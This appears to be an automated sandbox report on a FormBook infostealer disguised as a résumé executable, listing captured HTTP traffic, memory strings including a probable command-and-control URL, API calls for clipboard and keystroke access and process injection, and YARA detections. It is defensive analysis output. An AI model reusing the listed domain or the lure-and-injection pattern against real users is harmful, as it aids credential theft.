Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:06:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:06:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:06:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:07:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:07:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:07:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:07:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:07:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: KzlgpZBFalChd.exe, 00000007.00000002.3000295017.000000000591B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.bienmaigrir.info
Source: KzlgpZBFalChd.exe, 00000007.00000002.3000295017.000000000591B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.bienmaigrir.info/z7sc/
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wlanext.exe, 00000006.00000002.2997660019.000000000051F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wlanext.exe, 00000006.00000002.2997660019.000000000051F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: wlanext.exe, 00000006.00000002.2997660019.000000000051F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wlanext.exe, 00000006.00000002.2997660019.000000000051F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: wlanext.exe, 00000006.00000002.2997660019.000000000051F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wlanext.exe, 00000006.00000002.2997660019.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: wlanext.exe, 00000006.00000003.2338081049.00000000073BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wlanext.exe, 00000006.00000003.2348798155.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00346B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00346B0C

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00346D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00346D07

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

0_2_00346B0C

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00332B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00332B37

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0035F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0035F7FF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2998690477.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2998739243.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2156547508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2158110469.0000000006190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2998584831.00000000027D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2157416281.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2997273586.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3000295017.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: This is a third-party compiled AutoIt script.	0_2_002F3D19
Source: CV_ Filipa Barbosa.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CV_ Filipa Barbosa.exe, 00000000.00000000.1747933670.000000000039E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ca12747d-4
Source: CV_ Filipa Barbosa.exe, 00000000.00000000.1747933670.000000000039E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: 2SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c486a23b-5
Source: CV_ Filipa Barbosa.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7a9a83e8-b
Source: CV_ Filipa Barbosa.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3805f451-4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C703 NtClose,	1_2_0042C703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72B60 NtClose,LdrInitializeThunk,	1_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,	1_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C74340 NtSetContextThread,	1_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C74650 NtSuspendThread,	1_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72BE0 NtQueryValueKey,	1_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72BF0 NtAllocateVirtualMemory,	1_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72B80 NtQueryInformationFile,	1_2_03C72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72BA0 NtEnumerateValueKey,	1_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72AD0 NtReadFile,	1_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72AF0 NtWriteFile,	1_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72AB0 NtWaitForSingleObject,	1_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72FE0 NtCreateFile,	1_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72F90 NtProtectVirtualMemory,	1_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72FA0 NtQuerySection,	1_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72FB0 NtResumeThread,	1_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72F60 NtCreateProcessEx,	1_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72F30 NtCreateSection,	1_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72EE0 NtQueueApcThread,	1_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72E80 NtReadVirtualMemory,	1_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72EA0 NtAdjustPrivilegesToken,	1_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72E30 NtWriteVirtualMemory,	1_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72DD0 NtDelayExecution,	1_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72DB0 NtEnumerateKey,	1_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72D00 NtSetInformationFile,	1_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72D10 NtMapViewOfSection,	1_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72D30 NtUnmapViewOfSection,	1_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72CC0 NtQueryVirtualMemory,	1_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72CF0 NtOpenProcess,	1_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72CA0 NtQueryInformationToken,	1_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72C60 NtCreateKey,	1_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72C70 NtFreeVirtualMemory,	1_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C72C00 NtQueryInformationProcess,	1_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C73090 NtSetValueKey,	1_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C73010 NtOpenDirectoryObject,	1_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C739B0 NtGetContextThread,	1_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C73D70 NtOpenThread,	1_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C73D10 NtOpenProcessToken,	1_2_03C73D10

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00336606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00336606

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0032ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0032ACC5

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_003379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_003379D3

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031B043	0_2_0031B043
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00303200	0_2_00303200
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00303B70	0_2_00303B70
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0032410F	0_2_0032410F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003102A4	0_2_003102A4
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0032038E	0_2_0032038E
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002FE3E3	0_2_002FE3E3
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0032467F	0_2_0032467F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003106D9	0_2_003106D9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0035AACE	0_2_0035AACE
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00324BEF	0_2_00324BEF
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031CCC1	0_2_0031CCC1
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F6F07	0_2_002F6F07
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002FAF50	0_2_002FAF50
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0030B11F	0_2_0030B11F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031D1B9	0_2_0031D1B9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003531BC	0_2_003531BC
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031123A	0_2_0031123A
